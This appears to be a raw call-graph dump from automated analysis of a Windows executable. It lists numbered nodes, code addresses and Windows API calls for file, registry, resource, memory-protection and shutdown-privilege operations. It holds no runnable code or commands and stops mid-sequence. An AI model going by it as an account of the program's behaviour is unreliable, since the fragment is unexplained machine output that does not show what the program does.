6186->6187 6188 408f44 SetLastError 6189 408f4d 6188->6189 6190 402b48 RaiseException 6197 40294a 6198 402952 6197->6198 6199 403554 4 API calls 6198->6199 6200 402967 6198->6200 6199->6198 6201 403f4a 6202 403f53 6201->6202 6203 403f5c 6201->6203 6205 403f07 6202->6205 6206 403f09 6205->6206 6210 403e9c 6206->6210 6211 403154 4 API calls 6206->6211 6214 403f3d 6206->6214 6228 403e9c 6206->6228 6207 403f3c 6207->6203 6209 403ef2 6212 402674 4 API calls 6209->6212 6210->6207 6210->6209 6216 403ea9 6210->6216 6219 403e8e 6210->6219 6211->6206 6215 403ecf 6212->6215 6214->6203 6215->6203 6216->6215 6218 402674 4 API calls 6216->6218 6218->6215 6220 403e4c 6219->6220 6221 403e67 6220->6221 6222 403e62 6220->6222 6223 403e7b 6220->6223 6226 403e78 6221->6226 6227 402674 4 API calls 6221->6227 6225 403cc8 4 API calls 6222->6225 6224 402674 4 API calls 6223->6224 6224->6226 6225->6221 6226->6209 6226->6216 6227->6226 6230 403ed7 6228->6230 6234 403ea9 6228->6234 6229 403ef2 6231 402674 4 API calls 6229->6231 6230->6229 6233 403e8e 4 API calls 6230->6233 6232 403ecf 6231->6232 6232->6206 6235 403ee6 6233->6235 6234->6232 6236 402674 4 API calls 6234->6236 6235->6229 6235->6234 6236->6232 5886 403a52 5887 403a74 5886->5887 5888 403a5a WriteFile 5886->5888 5888->5887 5889 403a78 GetLastError 5888->5889 5889->5887 5890 402654 5891 403154 4 API calls 5890->5891 5892 402614 5891->5892 5893 402632 5892->5893 5894 403154 4 API calls 5892->5894 5893->5893 5894->5893 5895 408e54 5898 408d20 5895->5898 5899 408d29 5898->5899 5900 403198 4 API calls 5899->5900 5901 408d37 5899->5901 5900->5899 6241 40755a GetFileSize 6242 407586 6241->6242 6243 407576 GetLastError 6241->6243 6243->6242 6244 40757f 6243->6244 6245 4073ec 21 API calls 6244->6245 6245->6242 6246 406f5b 6247 406f68 SetErrorMode 6246->6247 6252 40a161 6253 40a0d3 6252->6253 6254 4093fc 9 API calls 6253->6254 6256 40a0ff 6253->6256 6254->6256 6255 40a118 6257 40a121 73A25CF0 6255->6257 6258 40a12c 6255->6258 6256->6255 6259 40a112 RemoveDirectoryA 6256->6259 6257->6258 6260 40a154 6258->6260 6261 40357c 4 API calls 6258->6261 6259->6255 6262 40a14a 6261->6262 6263 4025ac 4 API calls 6262->6263 6263->6260 5906 402e64 5907 402e69 5906->5907 5908 402e7a RtlUnwind 5907->5908 5909 402e5e 5907->5909 5910 402e9d 5908->5910 6268 40a168 6269 40a16f 6268->6269 6271 40a19a 6268->6271 6278 40936c 6269->6278 6272 403198 4 API calls 6271->6272 6274 40a1d2 6272->6274 6273 40a174 6273->6271 6275 40a192 MessageBoxA 6273->6275 6276 403198 4 API calls 6274->6276 6275->6271 6277 40a1da 6276->6277 6279 4093d3 ExitWindowsEx 6278->6279 6280 409378 GetCurrentProcess OpenProcessToken 6278->6280 6281 40938a 6279->6281 6280->6281 6282 40938e LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6280->6282 6281->6273 6282->6279 6282->6281 5678 406f77 5679 406f68 SetErrorMode 5678->5679 6295 403f7d 6296 403fa2 6295->6296 6299 403f84 6295->6299 6298 403e8e 4 API calls 6296->6298 6296->6299 6297 403f8c 6298->6299 6299->6297 6300 402674 4 API calls 6299->6300 6301 403fca 6300->6301 6302 403d02 6309 403d12 6302->6309 6303 403ddf ExitProcess 6304 403db8 6306 403cc8 4 API calls 6304->6306 6305 403dea 6307 403dc2 6306->6307 6308 403cc8 4 API calls 6307->6308 6310 403dcc 6308->6310 6309->6303 6309->6304 6309->6305 6309->6309 6312 403da4 6309->6312 6313 403d8f MessageBoxA 6309->6313 6322 4019dc 6310->6322 6318 403fe4 6312->6318 6313->6304 6314 403dd1 6314->6303 6314->6305 6319 403fe8 6318->6319 6320 403f07 4 API calls 6319->6320 6321 404006 6320->6321 6323 401abb 6322->6323 6324 4019ed 6322->6324 6323->6314 6325 401a04 RtlEnterCriticalSection 6324->6325 6326 401a0e LocalFree 6324->6326 6325->6326 6327 401a41 6326->6327 6328 401a2f VirtualFree 6327->6328 6329 401a49 6327->6329 6328->6327 6330 401a70 LocalFree 6329->6330 6331 401a87 6329->6331 6330->6330 6330->6331 6332 401aa9 RtlDeleteCriticalSection 6331->6332 6333 401a9f RtlLeaveCriticalSection 6331->6333 6332->6314 6333->6332 5919 404206 5920 4041cc 5919->5920 5921 40420a 5919->5921 5922 404282 5921->5922 5923 403154 4 API calls 5921->5923 5924 404323 5923->5924 5925 402c08 5926 402c82 5925->5926 5929 402c19 5925->5929 5927 402c56 RtlUnwind 5928 403154 4 API calls 5927->5928 5928->5926 5929->5926 5929->5927 5932 402b28 5929->5932 5933 402b31 RaiseException 5932->5933 5934 402b47 5932->5934 5933->5934 5934->5927 6344 409f0b 6345 409984 4 API calls 6344->6345 6346 409f10 6345->6346 6347 409f15 6346->6347 6348 402f24 5 API calls 6346->6348 6349 407878 InterlockedExchange 6347->6349 6348->6347 6350 409f3f 6349->6350 6351 409f4f 6350->6351 6352 409984 4 API calls 6350->6352 6353 40760c 22 API calls 6351->6353 6352->6351 6354 409f6b 6353->6354 6355 4025ac 4 API calls 6354->6355 6356 409fa2 6355->6356 5866 40760c SetEndOfFile 5867 407623 5866->5867 5868 40761c 5866->5868 5869 4073ec 21 API calls 5868->5869 5869->5867 5935 403018 5936 403025 5935->5936 5940 403070 5935->5940 5937 40302a RtlUnwind 5936->5937 5938 40304e 5937->5938 5941 402f78 5938->5941 5942 402be8 5938->5942 5943 402bf1 RaiseException 5942->5943 5944 402c04 5942->5944 5943->5944 5944->5940 5949 407c23 5952 407c29 5949->5952 5950 40322c 4 API calls 5951 407cc1 5950->5951 5953 4032fc 4 API calls 5951->5953 5952->5950 5954 407ccb 5953->5954 5955 4057e0 4 API calls 5954->5955 5956 407cda 5955->5956 5957 403198 4 API calls 5956->5957 5958 407cf4 5957->5958 5186 407524 SetFilePointer 5187 407557 5186->5187 5188 407547 GetLastError 5186->5188 5188->5187 5189 407550 5188->5189 5191 4073ec GetLastError 5189->5191 5194 40734c 5191->5194 5203 4071e4 FormatMessageA 5194->5203 5197 407394 5199 4057e0 4 API calls 5197->5199 5200 4073a3 5199->5200 5210 403198 5200->5210 5204 40720a 5203->5204 5214 403278 5204->5214 5207 4050e4 5219 4050f8 5207->5219 5211 4031b7 5210->5211 5212 40319e 5210->5212 5211->5187 5212->5211 5213 4025ac 4 API calls 5212->5213 5213->5211 5215 403254 4 API calls 5214->5215 5216 403288 5215->5216 5217 403198 4 API calls 5216->5217 5218 4032a0 5217->5218 5218->5197 5218->5207 5220 405115 5219->5220 5227 404da8 5220->5227 5223 405141 5225 403278 4 API calls 5223->5225 5226 4050f3 5225->5226 5226->5197 5230 404dc3 5227->5230 5228 404dd5 5228->5223 5232 404b34 5228->5232 5230->5228 5235 404eca 5230->5235 5242 404d9c 5230->5242 5333 405890 5232->5333 5234 404b45 5234->5223 5236 404edb 5235->5236 5238 404f29 5235->5238 5236->5238 5239 404faf 5236->5239 5241 404f47 5238->5241 5245 404d44 5238->5245 5239->5241 5249 404d88 5239->5249 5241->5230 5243 403198 4 API calls 5242->5243 5244 404da6 5243->5244 5244->5230 5246 404d52 5245->5246 5252 404b4c 5246->5252 5248 404d80 5248->5238 5272 4039a4 5249->5272 5255 405900 5252->5255 5254 404b65 5254->5248 5256 40590e 5255->5256 5265 404c2c LoadStringA 5256->5265 5259 4050e4 19 API calls 5260 405946 5259->5260 5261 4031e8 4 API calls 5260->5261 5262 405951 5261->5262 5268 4031b8 5262->5268 5266 403278 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5265->5266 5267 404c59 5266->5267 5267->5259 5270 4031be 5268->5270 5269 4031e3 5269->5254 5270->5269 5271 4025ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5270->5271 5271->5270 5273 4039ab 5272->5273 5278 4038b4 5273->5278 5275 4039cb 5276 403198 4 API calls 5275->5276 5277 4039d2 5276->5277 5277->5241 5279 4038d5 5278->5279 5280 4038c8 5278->5280 5282 403934 5279->5282 5283 4038db 5279->5283 5306 403780 5280->5306 5284 403993 5282->5284 5285 40393b 5282->5285 5287 4038e1 5283->5287 5288 4038ee 5283->5288 5291 4037f4 3 API calls 5284->5291 5292 403941 5285->5292 5293 40394b 5285->5293 5286 4038d0 5286->5275 5313 403894 5287->5313 5290 403894 6 API calls 5288->5290 5295 4038fc 5290->5295 5291->5286 5328 403864 5292->5328 5294 4037f4 3 API calls 5293->5294 5297 40395d 5294->5297 5318 4037f4 5295->5318 5299 403864 9 API calls 5297->5299 5301 403976 5299->5301 5300 403917 5324 40374c 5300->5324 5303 40374c VariantClear 5301->5303 5305 40398b 5303->5305 5304 40392c 5304->5275 5305->5275 5307 4037f0 5306->5307 5308 403744 5306->5308 5307->5286 5308->5306 5309 403793 VariantClear 5308->5309 5310 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5308->5310 5311 4037dc VariantCopyInd 5308->5311 5312 4037ab 5308->5312 5309->5308 5310->5308 5311->5307 5311->5308 5312->5286 5314 4036b8 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5313->5314 5315 4038a0 5314->5315 5316 40374c VariantClear 5315->5316 5317 4038a9 5316->5317 5317->5286 5319 403845 VariantChangeTypeEx 5318->5319 5320 40380a VariantChangeTypeEx 5318->5320 5323 403832 5319->5323 5321 403826 5320->5321 5322 40374c VariantClear 5321->5322 5322->5323 5323->5300 5325 403766 5324->5325 5326 403759 5324->5326 5325->5304 5326->5325 5327 403779 VariantClear 5326->5327 5327->5304 5329 40369c 8 API calls 5328->5329 5330 40387b 5329->5330 5331 40374c VariantClear 5330->5331 5332 403882 5331->5332 5332->5286 5334 40589c 5333->5334 5335 404c2c 5 API calls 5334->5335 5336 4058c2 5335->5336 5337 4031e8 4 API calls 5336->5337 5338 4058cd 5337->5338 5339 403198 4 API calls 5338->5339 5340 4058e2 5339->5340 5340->5234 5341 409b24 5380 4030dc 5341->5380 5343 409b3a 5383 4042e8 5343->5383 5345 409b3f 5386 406518 5345->5386 5349 409b49 5396 408fc8 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5349->5396 5358 4031e8 4 API calls 5359 409b95 5358->5359 5432 407440 5359->5432 5364 409984 4 API calls 5366 409c22 5364->5366 5452 407400 5366->5452 5368 409be4 5368->5364 5368->5366 5369 409c63 5456 40794c 5369->5456 5370 409c48 5370->5369 5371 409984 4 API calls 5370->5371 5371->5369 5373 409c88 5466 408a2c 5373->5466 5377 409d07 5378 408a2c 23 API calls 5379 409cce 5378->5379 5379->5377 5379->5378 5488 403094 5380->5488 5382 4030e1 GetModuleHandleA GetCommandLineA 5382->5343 5384 403154 4 API calls 5383->5384 5385 404323 5383->5385 5384->5385 5385->5345 5489 405bf8 5386->5489 5395 406564 6F571CD0 5395->5349 5397 40901b 5396->5397 5579 406f00 SetErrorMode 5397->5579 5400 4071e4 5 API calls 5401 40904b 5400->5401 5402 403198 4 API calls 5401->5402 5403 409060 5402->5403 5404 409a14 GetSystemInfo VirtualQuery 5403->5404 5405 409ac8 5404->5405 5408 409a3e 5404->5408 5410 409580 5405->5410 5406 409aa9 VirtualQuery 5406->5405 5406->5408 5407 409a68 VirtualProtect 5407->5408 5408->5405 5408->5406 5408->5407 5409 409a97 VirtualProtect 5408->5409 5409->5406 5585 406b30 GetCommandLineA 5410->5585 5412 40963d 5414 4031b8 4 API calls 5412->5414 5413 406b8c 6 API calls 5417 40959d 5413->5417 5415 409657 5414->5415 5418 406b8c 5415->5418 5416 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5416->5417 5417->5412 5417->5413 5417->5416 5419 406bb3 GetModuleFileNameA 5418->5419 5420 406bd7 GetCommandLineA 5418->5420 5421 403278 4 API calls 5419->5421 5422 406bdc 5420->5422 5424 406bd5 5421->5424 5423 406be1 5422->5423 5426 406a50 4 API calls 5422->5426 5428 406be9 5422->5428 5425 403198 4 API calls 5423->5425 5427 406c04 5424->5427 5425->5428 5426->5422 5429 403198 4 API calls 5427->5429 5430 40322c 4 API calls 5428->5430 5431 406c19 5429->5431 5430->5427 5431->5358 5433 40744a 5432->5433 5606 4074d6 5433->5606 5609 4074d8 5433->5609 5434 407476 5435 40748a 5434->5435 5436 4073ec 21 API calls 5434->5436 5439 409ad0 FindResourceA 5435->5439 5436->5435 5440 409ae5 5439->5440 5441 409aea SizeofResource 5439->5441 5442 409984 4 API calls 5440->5442 5443 409af7 5441->5443 5444 409afc LoadResource 5441->5444 5442->5441 5445 409984 4 API calls 5443->5445 5446 409b0a 5444->5446 5447 409b0f LockResource 5444->5447 5445->5444 5448 409984 4 API calls 5446->5448 5449 409b20 5447->5449 5450 409b1b 5447->5450 5448->5447 5449->5368 5482 407878 5449->5482 5451 409984 4 API calls 5450->5451 5451->5449 5453 407414 5452->5453 5454 407424 5453->5454 5455 40734c 20 API calls 5453->5455 5454->5370 5455->5454 5457 407959 5456->5457 5458 4057e0 4 API calls 5457->5458 5459 4079ad 5457->5459 5458->5459 5460 407878 InterlockedExchange 5459->5460 5461 4079bf 5460->5461 5462 4057e0 4 API calls 5461->5462 5463 4079d5 5461->5463 5462->5463 5464 407a18 5463->5464 5465 4057e0 4 API calls 5463->5465 5464->5373 5465->5464 5478 408a5d 5466->5478 5479 408aa6 5466->5479 5467 408af1 5621 407bdc 5467->5621 5469 408b08 5472 4031b8 4 API calls 5469->5472 5471 4034f0 4 API calls 5471->5479 5474 408b22 5472->5474 5473 4031e8 4 API calls 5473->5478 5485 404b70 5474->5485 5475 403420 4 API calls 5475->5478 5476 403420 4 API calls 5476->5479 5477 4031e8 4 API calls 5477->5479 5478->5473 5478->5475 5478->5479 5480 407bdc 23 API calls 5478->5480 5612 4034f0 5478->5612 5479->5467 5479->5471 5479->5476 5479->5477 5481 407bdc 23 API calls 5479->5481 5480->5478 5481->5479 5674 407824 5482->5674 5486 402594 4 API calls 5485->5486 5487 404b7b 5486->5487 5487->5379 5488->5382 5490 405890 5 API calls 5489->5490 5491 405c09 5490->5491 5492 4051d0 GetSystemDefaultLCID 5491->5492 5494 405206 5492->5494 5493 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5493->5494 5494->5493 5495 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5494->5495 5496 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5494->5496 5499 405268 5494->5499 5495->5494 5496->5494 5497 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5497->5499 5498 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5498->5499 5499->5497 5499->5498 5500 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5499->5500 5501 4052eb 5499->5501 5500->5499 5502 4031b8 4 API calls 5501->5502 5503 405305 5502->5503 5504 405314 GetSystemDefaultLCID 5503->5504 5561 40515c GetLocaleInfoA 5504->5561 5507 4031e8 4 API calls 5508 405354 5507->5508 5509 40515c 5 API calls 5508->5509 5510 405369 5509->5510 5511 40515c 5 API calls 5510->5511 5512 40538d 5511->5512 5567 4051a8 GetLocaleInfoA 5512->5567 5515 4051a8 GetLocaleInfoA 5516 4053bd 5515->5516 5517 40515c 5 API calls 5516->5517 5518 4053d7 5517->5518 5519 4051a8 GetLocaleInfoA 5518->5519 5520 4053f4 5519->5520 5521 40515c 5 API calls 5520->5521 5522 40540e 5521->5522 5523 4031e8 4 API calls 5522->5523 5524 40541b 5523->5524 5525 40515c 5 API calls 5524->5525 5526 405430 5525->5526 5527 4031e8 4 API calls 5526->5527 5528 40543d 5527->5528 5529 4051a8 GetLocaleInfoA 5528->5529 5530 40544b 5529->5530 5531 40515c 5 API calls 5530->5531 5532 405465 5531->5532 5533 4031e8 4 API calls 5532->5533 5534 405472 5533->5534 5535 40515c 5 API calls 5534->5535 5536 405487 5535->5536 5537 4031e8 4 API calls 5536->5537 5538 405494 5537->5538 5539 40515c 5 API calls 5538->5539 5540 4054a9 5539->5540 5541 4054c6 5540->5541 5542 4054b7 5540->5542 5544 40322c 4 API calls 5541->5544 5575 40322c 5542->5575 5545 4054c4 5544->5545 5546 40515c 5 API calls 5545->5546 5547 4054e8 5546->5547 5548 405505 5547->5548 5549 4054f6 5547->5549 5550 403198 4 API calls 5548->5550 5551 40322c 4 API calls 5549->5551 5552 405503 5550->5552 5551->5552 5569 4033b4 5552->5569 5554 405527 5555 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5554->5555 5556 405541 5555->5556 5557 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5556->5557 5558 40555b 5557->5558 5559 405c44 GetVersionExA 5558->5559 5560 405c5b 5559->5560 5560->5395 5562 405183 5561->5562 5563 405195 5561->5563 5564 403278 4 API calls 5562->5564 5565 40322c 4 API calls 5563->5565 5566 405193 5564->5566 5565->5566 5566->5507 5568 4051c4 5567->5568 5568->5515 5570 4033bc 5569->5570 5571 403254 4 API calls 5570->5571 5572 4033cf 5571->5572 5573 4031e8 4 API calls 5572->5573 5574 4033f7 5573->5574 5577 403230 5575->5577 5576 403252 5576->5545 5577->5576 5578 4025ac 4 API calls 5577->5578 5578->5576 5583 403414 5579->5583 5582 406f4e 5582->5400 5584 403418 LoadLibraryA 5583->5584 5584->5582 5592 406a50 5585->5592 5587 406b53 5588 406a50 4 API calls 5587->5588 5589 406b65 5587->5589 5588->5587 5590 403198 4 API calls 5589->5590 5591 406b7a 5590->5591 5591->5417 5593 406a7c 5592->5593 5594 403278 4 API calls 5593->5594 5595 406a89 5594->5595 5602 403420 5595->5602 5597 406a91 5598 4031e8 4 API calls 5597->5598 5599 406aa9 5598->5599 5600 403198 4 API calls 5599->5600 5601 406acb 5600->5601 5601->5587 5603 403426 5602->5603 5605 403437 5602->5605 5604 403254 4 API calls 5603->5604 5603->5605 5604->5605 5605->5597 5607 4074d8 5606->5607 5608 407517 CreateFileA 5607->5608 5608->5434 5610 403414 5609->5610 5611 407517 CreateFileA 5610->5611 5611->5434 5613 4034fd 5612->5613 5620 40352d 5612->5620 5615 403526 5613->5615 5617 403509 5613->5617 5614 403198 4 API calls 5616 403517 5614->5616 5618 403254 4 API calls 5615->5618 5616->5478 5629 4025c4 5617->5629 5618->5620 5620->5614 5622 407bf7 5621->5622 5623 407bec 5621->5623 5644 407b80 5622->5644 5633 407dfc 5623->5633 5626 407bf5 5626->5469 5627 4057e0 4 API calls 5627->5626 5630 4025ca 5629->5630 5631 403154 4 API calls 5630->5631 5632 4025dc 5630->5632 5631->5632 5632->5616 5634 407e11 5633->5634 5636 407e20 5634->5636 5651 407d14 5634->5651 5637 407e5a 5636->5637 5638 407d14 19 API calls 5636->5638 5639 407e6e 5637->5639 5640 407d14 19 API calls 5637->5640 5638->5637 5643 407e9a 5639->5643 5648 407da4 5639->5648 5640->5639 5643->5626 5645 407bd3 5644->5645 5646 407b94 5644->5646 5645->5626 5645->5627 5646->5645 5662 407ad0 5646->5662 5649 407db3 VirtualFree 5648->5649 5650 407dc5 VirtualAlloc 5648->5650 5649->5650 5650->5643 5654 405814 5651->5654 5653 407d36 5653->5636 5655 405820 5654->5655 5656 4050e4 19 API calls 5655->5656 5657 40584d 5656->5657 5658 4031e8 4 API calls 5657->5658 5659 405858 5658->5659 5660 403198 4 API calls 5659->5660 5661 40586d 5660->5661 5661->5653 5663 407aec 5662->5663 5664 407adb 5662->5664 5666 407400 20 API calls 5663->5666 5665 4057e0 4 API calls 5664->5665 5665->5663 5667 407b00 5666->5667 5668 407400 20 API calls 5667->5668 5669 407b21 5668->5669 5670 407878 InterlockedExchange 5669->5670 5671 407b36 5670->5671 5672 407b4c 5671->5672 5673 4057e0 4 API calls 5671->5673 5672->5646 5673->5672 5675 407836 5674->5675 5676 407847 5674->5676 5677 40783b InterlockedExchange 5675->5677 5676->5368 5677->5676 5959 405a24 5960 405a34 5959->5960 5961 405a2c 5959->5961 5962 405a32 5961->5962 5963 405a3b 5961->5963 5966 40599c 5962->5966 5964 405890 5 API calls 5963->5964 5964->5960 5967 4059a4 5966->5967 5968 4059be 5967->5968 5971 403154 4 API calls 5967->5971 5969 4059c3 5968->5969 5970 4059da 5968->5970 5972 405890 5 API calls 5969->5972 5973 403154 4 API calls 5970->5973 5971->5967 5974 4059d6 5972->5974 5975 4059df 5973->5975 5977 403154 4 API calls 5974->5977 5976 405900 19 API calls 5975->5976 5976->5974 5978 405a08 5977->5978 5979 403154 4 API calls 5978->5979 5980 405a16 5979->5980 5980->5960 6365 409d26 6366 409d4b 6365->6366 6417 4096e8 6366->6417 6368 409da3 6445 4026c4 GetSystemTime 6368->6445 6370 409d50 6370->6368 6438 408cfc 6370->6438 6371 409da8 6399 409254 6371->6399 6375 409d7f 6378 409d87 MessageBoxA 6375->6378 6376 4031e8 4 API calls 6377 409dbd 6376->6377 6446 406888 6377->6446 6378->6368 6381 409d94 6378->6381 6441 4057b4 6381->6441 6386 409deb 6473 403340 6386->6473 6388 409df9 6389 4031e8 4 API calls 6388->6389 6390 409e09 6389->6390 6391 407440 23 API calls 6390->6391 6392 409e48 6391->6392 6393 402594 4 API calls 6392->6393 6394 409e68 6393->6394 6395 40794c 5 API calls 6394->6395 6396 409eaa 6395->6396 6397 407bdc 23 API calls 6396->6397 6398 409ed1 6397->6398 6405 409274 6399->6405 6402 409299 CreateDirectoryA 6403 409311 6402->6403 6404 4092a3 GetLastError 6402->6404 6406 40322c 4 API calls 6403->6406 6404->6405 6405->6402 6408 408cfc 4 API calls 6405->6408 6410 404be4 19 API calls 6405->6410 6413 4071e4 5 API calls 6405->6413 6415 408ccc 4 API calls 6405->6415 6416 4057e0 4 API calls 6405->6416 6488 406c54 6405->6488 6511 409148 6405->6511 6407 40931b 6406->6407 6409 4031b8 4 API calls 6407->6409 6408->6405 6411 409335 6409->6411 6410->6405 6412 4031b8 4 API calls 6411->6412 6414 409342 6412->6414 6413->6405 6414->6376 6415->6405 6416->6405 6418 409731 6417->6418 6423 4096f5 6417->6423 6419 40973a 6418->6419 6420 40973e 6418->6420 6421 409747 GetUserDefaultLangID 6419->6421 6430 40973c 6419->6430 6617 406f84 GetModuleHandleA GetProcAddress 6420->6617 6421->6430 6423->6418 6426 409721 6423->6426 6425 4097ef 6427 40969c 5 API calls 6425->6427 6428 40969c 5 API calls 6426->6428 6429 409728 6427->6429 6428->6429 6429->6370 6430->6425 6431 409791 6430->6431 6432 409787 GetACP 6430->6432 6433 40979e 6430->6433 6434 40969c 5 API calls 6431->6434 6432->6430 6432->6431 6433->6425 6435 4097e2 6433->6435 6436 4097d8 GetACP 6433->6436 6434->6429 6437 40969c 5 API calls 6435->6437 6436->6433 6436->6435 6437->6429 6439 408ccc 4 API calls 6438->6439 6440 408d18 6439->6440 6440->6375 6442 4057b9 6441->6442 6443 405890 5 API calls 6442->6443 6444 4057cb 6443->6444 6444->6444 6445->6371 6661 406780 6446->6661 6449 403454 4 API calls 6450 4068aa 6449->6450 6451 406620 6450->6451 6666 406844 6451->6666 6454 406650 6457 403340 4 API calls 6454->6457 6455 40665e 6456 403454 4 API calls 6455->6456 6458 406671 6456->6458 6459 40665c 6457->6459 6460 403340 4 API calls 6458->6460 6461 403198 4 API calls 6459->6461 6460->6459 6462 406693 6461->6462 6463 406598 6462->6463 6464 4065a2 6463->6464 6465 4065c5 6463->6465 6672 4068b0 6464->6672 6466 40322c 4 API calls 6465->6466 6469 4065ce 6466->6469 6468 4065a9 6468->6465 6470 4065b4 6468->6470 6469->6386 6471 403340 4 API calls 6470->6471 6472 4065c2 6471->6472 6472->6386 6474 403344 6473->6474 6475 4033a5 6473->6475 6476 4031e8 6474->6476 6477 40334c 6474->6477 6478 4031fc 6476->6478 6481 403254 4 API calls 6476->6481 6477->6475 6480 4031e8 4 API calls 6477->6480 6483 40335b 6477->6483 6479 403228 6478->6479 6484 4025ac 4 API calls 6478->6484 6479->6388 6480->6483 6481->6478 6482 403254 4 API calls 6485 403375 6482->6485 6483->6482 6484->6479 6486 4031e8 4 API calls 6485->6486 6487 4033a1 6486->6487 6487->6388 6530 4069b8 6488->6530 6491 406c86 6493 4069b8 5 API calls 6491->6493 6495 406cd2 6491->6495 6494 406c96 6493->6494 6496 406ca2 6494->6496 6498 406994 7 API calls 6494->6498 6538 4067e8 6495->6538 6496->6495 6499 406cc7 6496->6499 6502 4069b8 5 API calls 6496->6502 6498->6496 6499->6495 6550 406c28 GetWindowsDirectoryA 6499->6550 6504 406cbb 6502->6504 6503 406598 5 API calls 6505 406ce7 6503->6505 6504->6499 6506 406994 7 API calls 6504->6506 6507 40322c 4 API calls 6505->6507 6506->6499 6508 406cf1 6507->6508 6509 4031b8 4 API calls 6508->6509 6510 406d0b 6509->6510 6510->6405 6512 409168 6511->6512 6513 406598 5 API calls 6512->6513 6514 409181 6513->6514 6515 40322c 4 API calls 6514->6515 6516 40918c 6515->6516 6517 4068d8 6 API calls 6516->6517 6519 408cfc 4 API calls 6516->6519 6520 4033b4 4 API calls 6516->6520 6521 4057e0 4 API calls 6516->6521 6523 409208 6516->6523 6590 4090d4 6516->6590 6598 408f58 6516->6598 6517->6516 6519->6516 6520->6516 6521->6516 6524 40322c 4 API calls 6523->6524 6525 409213 6524->6525 6526 4031b8 4 API calls 6525->6526 6527 40922d 6526->6527 6528 403198 4 API calls 6527->6528 6529 409235 6528->6529 6529->6405 6531 4034f0 4 API calls 6530->6531 6532 4069cb 6531->6532 6533 4069e2 GetEnvironmentVariableA 6532->6533 6537 4069f5 6532->6537 6552 406d4c 6532->6552 6533->6532 6534 4069ee 6533->6534 6535 403198 4 API calls 6534->6535 6535->6537 6537->6491 6547 406994 6537->6547 6539 403414 6538->6539 6540 40680b GetFullPathNameA 6539->6540 6541 406817 6540->6541 6542 40682e 6540->6542 6541->6542 6543 40681f 6541->6543 6544 40322c 4 API calls 6542->6544 6545 403278 4 API calls 6543->6545 6546 40682c 6544->6546 6545->6546 6546->6503 6556 40693c 6547->6556 6551 406c49 6550->6551 6551->6495 6553 406d5a 6552->6553 6554 4034f0 4 API calls 6553->6554 6555 406d68 6554->6555 6555->6532 6563 4068d8 6556->6563 6558 40695e 6559 406966 GetFileAttributesA 6558->6559 6560 40697b 6559->6560 6561 403198 4 API calls 6560->6561 6562 406983 6561->6562 6562->6491 6573 4066a4 6563->6573 6565 4068e9 6567 406910 6565->6567 6580 4068d0 CharPrevA 6565->6580 6568 406926 6567->6568 6569 40691b 6567->6569 6581 403454 6568->6581 6570 40322c 4 API calls 6569->6570 6572 406924 6570->6572 6572->6558 6576 4066b5 6573->6576 6574 406719 6575 4065e0 IsDBCSLeadByte 6574->6575 6577 406714 6574->6577 6575->6577 6576->6574 6579 4066d3 6576->6579 6577->6565 6579->6577 6588 4065e0 IsDBCSLeadByte 6579->6588 6580->6565 6582 403486 6581->6582 6583 403459 6581->6583 6584 403198 4 API calls 6582->6584 6583->6582 6586 40346d 6583->6586 6585 40347c 6584->6585 6585->6572 6587 403278 4 API calls 6586->6587 6587->6585 6589 4065f4 6588->6589 6589->6579 6591 403198 4 API calls 6590->6591 6593 4090f5 6591->6593 6595 409122 6593->6595 6607 4032a8 6593->6607 6610 403494 6593->6610 6596 403198 4 API calls 6595->6596 6597 409137 6596->6597 6597->6516 6599 408e94 2 API calls 6598->6599 6600 408f6e 6599->6600 6601 408f72 6600->6601 6614 4069a8 6600->6614 6601->6516 6604 408fa5 6605 408ed0 Wow64RevertWow64FsRedirection 6604->6605 6606 408fad 6605->6606 6606->6516 6608 403278 4 API calls 6607->6608 6609 4032b5 6608->6609 6609->6593 6611 403498 6610->6611 6613 4034c3 6610->6613 6612 4034f0 4 API calls 6611->6612 6612->6613 6613->6593 6615 40693c 7 API calls 6614->6615 6616 4069b2 GetLastError 6615->6616 6616->6604 6618 406fc7 6617->6618 6636 406fbe 6617->6636 6619 406fd0 6618->6619 6620 407008 6618->6620 6638 406ec8 6619->6638 6622 406ec8 RegOpenKeyExA 6620->6622 6624 407021 6622->6624 6623 406fe9 6625 40703e 6623->6625 6641 406ebc 6623->6641 6624->6625 6627 406ebc 6 API calls 6624->6627 6629 40322c 4 API calls 6625->6629 6631 407035 RegCloseKey 6627->6631 6628 403198 4 API calls 6632 407080 6628->6632 6633 40704b 6629->6633 6631->6625 6634 403198 4 API calls 6632->6634 6635 4032fc 4 API calls 6633->6635 6637 407088 6634->6637 6635->6636 6636->6628 6637->6430 6639 406ed3 6638->6639 6640 406ed9 RegOpenKeyExA 6638->6640 6639->6640 6640->6623 6644 406d70 6641->6644 6645 406d96 RegQueryValueExA 6644->6645 6646 406db9 6645->6646 6659 406ddb 6645->6659 6647 406dd3 6646->6647 6651 403278 4 API calls 6646->6651 6652 403420 4 API calls 6646->6652 6646->6659 6649 403198 4 API calls 6647->6649 6648 403198 4 API calls 6650 406ea7 RegCloseKey 6648->6650 6649->6659 6650->6625 6651->6646 6653 406e10 RegQueryValueExA 6652->6653 6653->6645 6654 406e2c 6653->6654 6655 4034f0 4 API calls 6654->6655 6654->6659 6656 406e6e 6655->6656 6657 406e80 6656->6657 6660 403420 4 API calls 6656->6660 6658 4031e8 4 API calls 6657->6658 6658->6659 6659->6648 6660->6657 6662 4066a4 IsDBCSLeadByte 6661->6662 6665 406795 6662->6665 6663 4067df 6663->6449 6664 4065e0 IsDBCSLeadByte 6664->6665 6665->6663 6665->6664 6667 406853 6666->6667 6668 406780 IsDBCSLeadByte 6667->6668 6671 40685e 6668->6671 6669 40664a 6669->6454 6669->6455 6670 4065e0 